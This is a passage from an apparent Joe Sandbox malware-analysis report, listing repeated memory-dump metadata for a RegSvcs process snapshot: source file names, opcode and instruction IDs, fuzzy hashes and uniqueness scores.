                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8b4c51f82eaa8d829d658d0cf719f4b368659a381f021de40e8fd847eb2200ef
                                                          • Instruction ID: e95529a6828e5025ac2ad83504fd5b1998a06c3f7b2b547251a891d294c857b1
                                                          • Opcode Fuzzy Hash: 8b4c51f82eaa8d829d658d0cf719f4b368659a381f021de40e8fd847eb2200ef
                                                          • Instruction Fuzzy Hash: 0641F272900202DBDB34DF59C840A6ABBB1FBE9610F25822FE9219B365C7759842CB90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 979dba8659d1276d3c3b4fa4eba68d646773cdc09a394588c9f0c3a5f80014be
                                                          • Instruction ID: 0bd1b44aaab2b5e67247e2da2795410a784297ba2a85ddac95c97e6f542f477c
                                                          • Opcode Fuzzy Hash: 979dba8659d1276d3c3b4fa4eba68d646773cdc09a394588c9f0c3a5f80014be
                                                          • Instruction Fuzzy Hash: 2B4140725087169ED311EF598840A6FB7E9EF94B54F40092FF984D7260E730DE458B93
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction ID: 956e18870c2923859d02460652a93cd9875aada1d8e2e97be5ee3b5b505da888
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: FC412671A00221DFDB21EE1984607BFBB61EB60754FA5806BEE40CB760D63A9D80CB90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ada355bcdf88a67c357649771a497d7bc03960c218bdbcd5f9ee22f3f9a141c9
                                                          • Instruction ID: edd69ba0af774d280f46b10b358b94b703c4196dc9b4a22b1f557dba08c189c4
                                                          • Opcode Fuzzy Hash: ada355bcdf88a67c357649771a497d7bc03960c218bdbcd5f9ee22f3f9a141c9
                                                          • Instruction Fuzzy Hash: 3D415971640601EFD721DF19D840B26BBE4FFA8714F24866BE449CB361E771E9428B90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction ID: ae4e9210400225a4d38f778875654f722a136db5f7dc1bf8f5cb85060548cd8f
                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction Fuzzy Hash: 9B414971A00705EFDB24CF99C980AAABBF8FF18704B10496EE556D7260D330EA44CF91
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d924ba168c1786247b48f6cc4e212e2c22c76df767469682d17b8721e9ceb855
                                                          • Instruction ID: 0322e4beba96a2fc5ec7a62d929e70c70f4a660da4ae46b9a3be9a45826f0b4d
                                                          • Opcode Fuzzy Hash: d924ba168c1786247b48f6cc4e212e2c22c76df767469682d17b8721e9ceb855
                                                          • Instruction Fuzzy Hash: 43419E71501711DFC722EF29C940A6AB7F1FFA9320F1181AFC41A9B2B1DBB09941DB51
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcca6980c2202f66b1d2cc2fb4e2f10349c5eb2f99e9177d5428d5d79115720d
                                                          • Instruction ID: f15ccc4db3df864e8247fe864b53176b98a8c0f9d15cc78d758cfd14acb18bed
                                                          • Opcode Fuzzy Hash: fcca6980c2202f66b1d2cc2fb4e2f10349c5eb2f99e9177d5428d5d79115720d
                                                          • Instruction Fuzzy Hash: 263168B1A00246DFDB12CF98C440799BBF4FB19729F2181AED119EB2A1D3369906CB91
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d2ec09caefc396c049bfa0e67bdca159b437398aa7ea4159417d0d758762bbe
                                                          • Instruction ID: 627bfc2dc3be687040aff076bb0975cc63748470b215bd337550d283f18b103b
                                                          • Opcode Fuzzy Hash: 0d2ec09caefc396c049bfa0e67bdca159b437398aa7ea4159417d0d758762bbe
                                                          • Instruction Fuzzy Hash: 70419F725043419FD720DF29C844B9BBBE8FF98654F104A2FF998D7261D7709905CBA2
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3db1bdc8aa23c4aca8173ec11655187ff7cc69dac3816eced8102088c9dacccc
                                                          • Instruction ID: 3da73a910f96bc77d077111c5dda65fb5cf5acd7cb03fff5e5deedc9701f4bc0
                                                          • Opcode Fuzzy Hash: 3db1bdc8aa23c4aca8173ec11655187ff7cc69dac3816eced8102088c9dacccc
                                                          • Instruction Fuzzy Hash: 1C41D171A045279FDB01DF59C840ABDB7F1FF54660F64822BD815A73E0DB30AD818B90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82958e2c80877b93560e8c2c15ad5e267ebb48f9f1cc59fd4eb2d710b589c822
                                                          • Instruction ID: f867ae1d3a0c3b95de02937f7311a547395d7f8e0e80279b91378eee1b19b423
                                                          • Opcode Fuzzy Hash: 82958e2c80877b93560e8c2c15ad5e267ebb48f9f1cc59fd4eb2d710b589c822
                                                          • Instruction Fuzzy Hash: E541D3725047419FD320DF69C880AABB7F5BFD8700F14061EF958876A0E730D915C7A6
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90c1d4ceb6401d899ee59459aa7f4e5462e341e2d5fc3a37dfea3d1d0c30ef22
                                                          • Instruction ID: f631dfda97e2dda1cdfea37574368e9f264680e6cba8f5f1a6140d3df979c0ff
                                                          • Opcode Fuzzy Hash: 90c1d4ceb6401d899ee59459aa7f4e5462e341e2d5fc3a37dfea3d1d0c30ef22
                                                          • Instruction Fuzzy Hash: 3141B0312003028BD725DF29D884B6BBBE9EFD9360F18446EEA558B3B1DB70D805CB91
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9b523e929e89c41ebff7796b02b7f9015203e3c503ece53c7cb474c1d5de5ab
                                                          • Instruction ID: c50541937cb9a9c829538f37f1cf10a789dc001ec4954afe45b8bca4b11bdff1
                                                          • Opcode Fuzzy Hash: b9b523e929e89c41ebff7796b02b7f9015203e3c503ece53c7cb474c1d5de5ab
                                                          • Instruction Fuzzy Hash: F1419271A01626CFCB15DF6AC98099DBBF1FF98320B54856FE466A73B0D734A981CB40
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction ID: 587215e48f25395d2e0f2153e088178fd64788a2eabe736bf6be110939319d6f
                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction Fuzzy Hash: 10311831A04244AFEB219B69CC44BDBBFE9EF54350F04856BF855D7362C7749845CBA0
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a82224c93d1f4f0d2742327a09e1723f7c46fda929a126062844d152a4fcc504
                                                          • Instruction ID: 14c50d0b3a94e3a75154d565a3edddedfe6f96adfd91244b61a07d691b055d34
                                                          • Opcode Fuzzy Hash: a82224c93d1f4f0d2742327a09e1723f7c46fda929a126062844d152a4fcc504
                                                          • Instruction Fuzzy Hash: 0E319C35740716ABEB329F568C51F6F7AA5AB59B50F10003AFA04BF3A1DAB4DC01C791
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1efe465e5c74e0ae464b55b0d57af0df917e79800bc85c3cbdff663c08bc168
                                                          • Instruction ID: d4891942fa2abb4b5370a60809e1b5ae6c656aa08ce5cce98d68de20b47e4992
                                                          • Opcode Fuzzy Hash: b1efe465e5c74e0ae464b55b0d57af0df917e79800bc85c3cbdff663c08bc168
                                                          • Instruction Fuzzy Hash: 3531EF322052018FC731DF19D884E26B7E5FB85361F0A446EE9A9DB361D730E855DB90
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6c48e9b441476695073603b61fe9f0c853936da1960b22430f0cb964072cda0
                                                          • Instruction ID: e9b13a9f5da11e4739ff11bcd41ebe854e0f3bf3e53e0ec2a594df0c95aa2447
                                                          • Opcode Fuzzy Hash: e6c48e9b441476695073603b61fe9f0c853936da1960b22430f0cb964072cda0
                                                          • Instruction Fuzzy Hash: D141AD71200B459FDB22CF69C880BD77BE9AB99714F15846EEA9A8B360C774E804CB50
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 518ce7df6f0b1dad5b5aa1707ba5905a99fb053036aeb4c40c899707f2b399d9
                                                          • Instruction ID: 399e5a0f713e616aadda9fb7a9ab62056688d47eaabcf8950d34d364cb3b5afa
                                                          • Opcode Fuzzy Hash: 518ce7df6f0b1dad5b5aa1707ba5905a99fb053036aeb4c40c899707f2b399d9
                                                          • Instruction Fuzzy Hash: 5131AF716042018FD720DF29D885E2AB7E5FB84720F0A496EF965DB3A1D730EC15DB91
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9fd083a8b83a09ec377823a1de2e10d4e94bd8f8dae40ae7e45c6fbebecbb3c
                                                          • Instruction ID: db94c439599e3ef6a239257514540ad76f55e11b8def97ba9865f29c5da588f0
                                                          • Opcode Fuzzy Hash: f9fd083a8b83a09ec377823a1de2e10d4e94bd8f8dae40ae7e45c6fbebecbb3c
                                                          • Instruction Fuzzy Hash: 23310A712416829BF322D75DC94CB56BBD8BB20B40F5E00A6AB51AB7F1D738D841C230
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8d957ce2da28c896f0cfa8fdfab2513759de40d33d868fef9c8d054d1e6aaae
                                                          • Instruction ID: bbe80a4e25c5eeb1827910b4f467fcb141781262cd5d18be48238bce629aa38d
                                                          • Opcode Fuzzy Hash: d8d957ce2da28c896f0cfa8fdfab2513759de40d33d868fef9c8d054d1e6aaae
                                                          • Instruction Fuzzy Hash: 0931C47AA00156EBDB15EF98CC40BAEB7B5FB44B40F46416EEA00AB354D770ED01CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f51edf83c3b27ee6680a939b3fc31d2d871f15358d41d8a77c40190c2ddd2e12
                                                          • Instruction ID: ed5a42eda87f889bbd605b7bc61b065626d8418810a5b4abcbf9590220d0bbfc
                                                          • Opcode Fuzzy Hash: f51edf83c3b27ee6680a939b3fc31d2d871f15358d41d8a77c40190c2ddd2e12
                                                          • Instruction Fuzzy Hash: EA317876A4012DABCF21DF55DC84BDEBBF5ABA8350F1401E6E508A7260CA30DE51CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4040995aeed8078bc252aa3d05e7721078985aa098d016ad646ba7d27563ab2f
                                                          • Instruction ID: 7b7326cf78b6cd5e67c83b5a6538f37207721abb541c064cad3974becc68ef62
                                                          • Opcode Fuzzy Hash: 4040995aeed8078bc252aa3d05e7721078985aa098d016ad646ba7d27563ab2f
                                                          • Instruction Fuzzy Hash: 8831C672E00215AFDB71DFA9C840A9FFBB9EF54750F01452BE916E7261D2709B018BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4bdb32ce2aa56b7d955605dcfffc175d72b7e9c53688a25c9f05d6de14c77bca
                                                          • Instruction ID: 29126f78380451fc7b14ee9217fd37c0f74c59d3d1401bc303f4d7ef739e10bd
                                                          • Opcode Fuzzy Hash: 4bdb32ce2aa56b7d955605dcfffc175d72b7e9c53688a25c9f05d6de14c77bca
                                                          • Instruction Fuzzy Hash: A231F672700216AFDB22DF9ACD40B6BBBB9AF54310F12006EE605DB361DA70DC0187D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f6b9d78732d7345bfd8e4663c188f20813c394d44e47e420e7660a201b9d12
                                                          • Instruction ID: eb5c881dc35e78511027d96086e7e76955d26f820f589f0608d835c3a6c92680
                                                          • Opcode Fuzzy Hash: 14f6b9d78732d7345bfd8e4663c188f20813c394d44e47e420e7660a201b9d12
                                                          • Instruction Fuzzy Hash: D531C872A04612DBC716DE298880A6BBBA5AFE8660F01462FFD55A7330DB30DC018BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74202601eb8c850913c47b53b8c9ddbee9234f0d97d28426b2bc398e519fd065
                                                          • Instruction ID: dae4b12b1005e1c6ddb89c04a1e282276b17c35be0dfdfeb31e87ea3fa838e54
                                                          • Opcode Fuzzy Hash: 74202601eb8c850913c47b53b8c9ddbee9234f0d97d28426b2bc398e519fd065
                                                          • Instruction Fuzzy Hash: EE319CB16053029FE721CF19C840B2BFBE5AB98710F044A6EFA84973A1D3B4E844CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction ID: 9a1ef53035982f9d8b7536da32365bf023dc95473ad0b15756a9593ec1ab4bad
                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                          • Instruction Fuzzy Hash: 4A314DB2B00B01AFD761CF69DD40B57BBFCBB18A54F19052EA59AD3760E630E800CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 483d55865d5a9cdb4d0cfa3be27ced65f3fbe223f6f1918d952ebda2f3540290
                                                          • Instruction ID: 5f01f109d2bebb606a8fd975263eb1b3a19d71dee0c1f334383fd767d1f8327a
                                                          • Opcode Fuzzy Hash: 483d55865d5a9cdb4d0cfa3be27ced65f3fbe223f6f1918d952ebda2f3540290
                                                          • Instruction Fuzzy Hash: 7C318972505311CFCB21DF1AC55095ABBF1FF9AA14F0449AEE888AF361D331DA45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f78b4cf170d84a2912b14cd57efa389c21f7c4091886ec9010b4e712137e17c
                                                          • Instruction ID: e76a39f752cd9c3579746557003d41d20992d99cb791eca68a0a02826244c48e
                                                          • Opcode Fuzzy Hash: 5f78b4cf170d84a2912b14cd57efa389c21f7c4091886ec9010b4e712137e17c
                                                          • Instruction Fuzzy Hash: B931D332B002059FDB60EFA9C980A6F7BF9EB91304F04843BD905DB261E730E985CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction ID: 3c5dad889ae5b3770376c7bcfa4c53ef5a916123e94dbddd5c2f44c9dfa6730d
                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                          • Instruction Fuzzy Hash: CF212B36E4026BABD710EFBA8840BAFBBB5AF14740F158037DE15E7350E2B0D94187A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27f61163854919827b0848c08877f6bf4bebcb57a9561840880f4485bca7920b
                                                          • Instruction ID: 367b61af1882ac27455d2a5965fe930a41725d3b1d2d959bcd0b24bf6f40bb0f
                                                          • Opcode Fuzzy Hash: 27f61163854919827b0848c08877f6bf4bebcb57a9561840880f4485bca7920b
                                                          • Instruction Fuzzy Hash: C23149729012118BD731BF58CC41BAD77B4AF50314F54816FED4A9F3E2DA749986CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction ID: 761cc7cb11d029cd1ed1b6d765cbe84c7724088a9cb1cbe374141ae00181aa18
                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction Fuzzy Hash: 0D213036600656B7CB25ABA68C44ABBBBF4EF60711F40802FFE5587671E634D940C360
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94bc310128f90735db917f2495a822dec77f15865cae7b2af3ba4a6bbbaf44e3
                                                          • Instruction ID: 235cdfd72bbcb1d64679774f7617ce211242d8956406af11bb9573f0870c593a
                                                          • Opcode Fuzzy Hash: 94bc310128f90735db917f2495a822dec77f15865cae7b2af3ba4a6bbbaf44e3
                                                          • Instruction Fuzzy Hash: 9931A432A0152C9BDB31DF19CC41BEA77B9AF25750F4101A6E645BB2A0D6749EC18F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction ID: 4879363c6d68886271cbe199dd0a5bb984d4e7cfa68073713a1504c79ff83f15
                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction Fuzzy Hash: 5B21A331A00609EFCF15CF59C980A9EBBB9FF58318F14806AEE199F251D674EE05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbbf8ec31c8dd022419811665c08e3e1a28a9c53fb3fd60f5f58f7889b0c4a22
                                                          • Instruction ID: 79d95bc0db042288d224d18a39c9095690acf39ed99636298d9ba94ba505b425
                                                          • Opcode Fuzzy Hash: dbbf8ec31c8dd022419811665c08e3e1a28a9c53fb3fd60f5f58f7889b0c4a22
                                                          • Instruction Fuzzy Hash: B421E1726047059BCB22CF19C880B6B77E8FB98764F09451AFE549B251D730ED01CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
